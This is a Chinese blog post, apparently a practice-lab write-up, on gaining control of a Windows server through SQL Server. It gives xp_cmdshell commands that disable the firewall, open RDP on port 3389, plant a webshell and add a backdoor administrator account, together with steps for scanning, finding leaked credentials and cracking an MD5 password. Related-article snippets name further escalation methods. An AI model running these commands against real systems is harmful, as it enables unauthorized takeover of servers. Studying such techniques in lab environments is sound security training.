SQL server提权_环境实操wp

最新推荐文章于 2023-10-20 11:04:06 发布
最新推荐文章于 2023-10-20 11:04:06 发布
阅读量277 收藏
点赞数
分类专栏: 渗透学习 文章标签: 数据库提权 cmdshell 远程桌面 防火墙 系统控制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHUNJIUJUN/article/details/119756664
版权

数据库提权
exec sp_configure 'show advanced options' 1;reconfigure;

exec sp_configure 'xp_cmdshell' 1;reconfigure;

exec master..xp_cmdshell 'D:/pte/3389.exe';

exec master..xp_cmdshell 'netsh firewall set opmode disable';    关闭防火墙

exec master..xp_cmdshell 'netsh firewall set portopening tcp 3389 telnet enable custom 'your_ip';

enable

拿到IP,先进去看看,发现啥都没有

 上nmap和御剑扫一下端口

没扫到啥新鲜的端口,去8080端口看看

是个登录框,试了试弱口令什么的都不行,上御剑扫一下目录 

发现一个www.zip,进去试试 

 发现一个config文件

拿到了数据库账号密码,登上去看看

 拿到一个key,再找找 

拿到管理员账号密码,从8080端口登进去看看

没登上去,发现密码是拿md5加密了,解密一下为   woaini521

成功登进去,拿到key

找了找其他地方看看有没有可以文件上传的点,发现都没什么用

于是去数据库提权试试,开启cmdshell

 用cmdshell传一句话木马

访问一下看看 

可以访问,也解析了,连蚁剑

传net.exe和3389.vbs

开启远程桌面
exec master..xp_cmdshell 'D:/oa/3389.vbs'

添加用户

exec master..xp_cmdshell 'D:/oa/net111.exe user mmm mmm /add';

添加用户到管理员组

exec master..xp_cmdshell 'D:/oa/net111.exe localgroup administrators mmm /add';

开启防火墙白名单

远程连接

 成功远控

tacooo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
110.网络安全渗透测试—[权限提升篇8]—[Windows SqlServer xp_cmdshell存储过程提权]
qwsn
07-05 3378
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码,可以开启xp_cmdshell存储过程,以sqlserver的身份执行系统命令。但是不一定是系统权限,还要看管理员在一开始安装sqlserver的权限设置。(1)xp_cmdshell存储过程【存储过程是:已预编译为一个可执行过程的一个或多个SQL语句的集合】,它是用来执行本机的cmd命令的,要求系统登陆有sa权限。默认情况下,sql serve
2021-06-01web渗透学习之SQLserver提权(mssql
qq_45290991的博客
06-01 240
我转了一篇个人觉得写得很好的博客,上一篇:2021-06-01sql提权 这一篇是月大佬的工具实战篇,csdn有人提供下载,我就不说了,直接上实战图片: 假设已经上传了大马,查找了这几个文件发现了sa用户的密码为123456: web.config config.asp conn.aspx database.aspx 登录(连接sql server) 执行cmd: ...
windows 提权——数据库提权
最新发布
Xiaolisec的博客
10-20 150
windows 提权——数据库提权UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展。通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令,将MYSQL账号root转化为系统system权限。1.对于CMS,查找配置文件(inc.php/config.php/connect.php)
[WEB安全]MSSQL/SQL Server 提权手法详解
网络安全知识分享
12-17 7238
SQL Server 提权手法详解一、SQL Server 的安装二、SQL Server SA用户的添加三、原理四、xp_cmd提权过程五、OLE提权过程六、xp_regread & xp_regwrite克隆账号 环境:Win10 、SQL Server 2008 一、SQL Server 的安装 介绍: ​ Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统,应用领域十分广泛,从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。 点击exe后
渗透综合靶场---SqlServer提权
q
12-22 1056
再次查询是否开启3389端口,已开启就使用mstsc连接----exec xp_cmdshell'netstat -ant | find "3389"'查看目标是否开启3389端口----exec xp_cmdshell'netstat -ant | find "3389"'如何找到上传的文件所在目录,使用burp抓包点击文件,然后修改文件名,然后再放包,浏览器因为找不到文件会报错。扫描端口,知道目标ip,扫描目标ip开启了多少端口,(1-65535) 扫描出下面端口。
SQL提权
小向资源网博客
08-15 946
UDF手工提权辅助: select @@basedir;  #查看mysql安装目录 select 'It is dll' into dumpfile 'C:\。。lib::';  #利用NTFS ADS创建lib目录 select 'It is dll' into dumpfile 'C:\。。lib\plugin::';  #利用NTFS ADS创建plugin目录 select 0...
SQLserver提权
一个普普通通的博客
04-17 2913
SQLserver提权
sqlserver提权
YouthBelief的博客
12-19 1636
1.xp_cmdshell提权 默认在sqlserver2000中开启,2005后默认禁止,使用sp_configure重新打开它 sa权限下 使用xp_cmdshell可以 以system权限执行操作系统命令。 开启xp_cmdshell exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell',1; reconfigure; 关闭xp_cmdshell exec sp_confi
第三方组件提权-SQL server提权
Love&Share
11-20 2575
文章目录基础MSSQL权限级别拿webshellxp_cmdshell执行系统命令LOG备份getshell提权使用xp_cmdshell进行提权以下内容为转载使用sp_oacreate进行提权|无回显sp_oacreate简介sp_oacreate使用沙盒提权SQL Server 沙盒简介JOB提权使用xp_regwrite提权 | 映像劫持提权其他骚操作使用sp_makewebtask写文件总结二级内网MSSQL渗透|上线CS 基础 MSSQL(MicroSoft SQL Server数据库),是微软.
SQL Server提权系列
2301_77152761的博客
05-11 360
CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。3、设置项目属性,目标平台修改为需要的目标平台,如SQL Server 2012;4、右键项目,选择添加->新建项,新建SQL CLR C# 存储过程。7、双击此文件进行解压,将解压出一个名为mode.sql的文件。2、SQL Server当前账号具有执行命令/代码所需要的权限。8、执行SQL文件中的以下语句。
易语言 SQL提权工具 源码
09-16
易语言编写SQL server 2000 提权工具 源码
MSSQL手工注入并提权
07-24
MSSQL手工注入并提权
sql.rar_delphi sql server_sql_sql server
09-20
在标签中,“delphi_sql_server”表明该项目使用的是Delphi编程环境,它是一种基于Object Pascal的集成开发环境(IDE),广泛用于创建桌面应用程序。而“sql”和“sql_server”标签进一步强调了与SQL语言和Microsoft...
cn_sql_server_2008_r2_management_tools_x64和X86版本.zip
08-23
文件名"cn_sql_server_2008_r2_express_with_management_tools_x64.exe"和"cn_sql_server_2008_r2_express_with_management_tools_x86.exe"分别代表了x64和x86版本的SQL Server 2008 R2 Express版,该版本是SQL ...
SqlServer卸载工具_x86_64.zip
05-07
想要卸载SQL 2005安装新的2008版本,发现安装不上,原来是以前的数据库没有卸载干净。...本工具可以直接删除SQL SERVER的所有相关组件,然后删除实例目录,最后删除注册表就好了。完美删除SQL SERVER
cn_sql_server_2017_developer_x64_dvd_11296175.iso
04-26
sqlserver2017 developer版本;SQL Server是由Microsoft开发和推广的关系数据库管理系统(DBMS),它最初是由Microsoft、Sybase和Ashton-Tate三家公司共同开发的,并于1988年推出了第一个OS/2版本。Microsoft SQL ...
SQLServer2005_BC_x64补丁 ,SQLServer2005_BC 32位补丁
06-01
此外,它也确保了在64位环境SQL Server 2005 BC组件的稳定运行。 安装这两个补丁时,用户需要注意以下几点: 1. 在安装前,确保已经备份了所有重要的数据库和配置信息,以防万一出现问题。 2. 检查当前SQL Server...
SQL Server 存储过程提权方法
PaidaxingSec的博客
02-08 883
SQL Server 存储过程提权方法

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值